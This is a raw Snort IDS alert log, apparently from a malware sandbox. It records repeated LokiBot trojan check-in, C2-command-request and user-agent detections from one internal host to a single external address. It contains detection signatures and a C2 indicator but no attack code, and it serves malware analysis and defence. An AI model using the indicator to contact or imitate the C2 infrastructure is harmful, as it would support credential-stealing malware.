Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49757 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49758 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49759 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49760 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49760 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49761 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49762 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49763 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49764 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49765 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49766 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49767 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49768 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49769 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49770 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49772 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49773 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49774 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49775 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49776 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49776 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49777 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49778 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49779 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49780 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49781 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49782 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49783 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49784 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49785 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49786 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49787 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49788 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49789 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49790 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49791 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49792 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49793 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49794 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49795 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49796 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49797 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49798 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49799 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49800 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49801 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 104.21.13.124:80
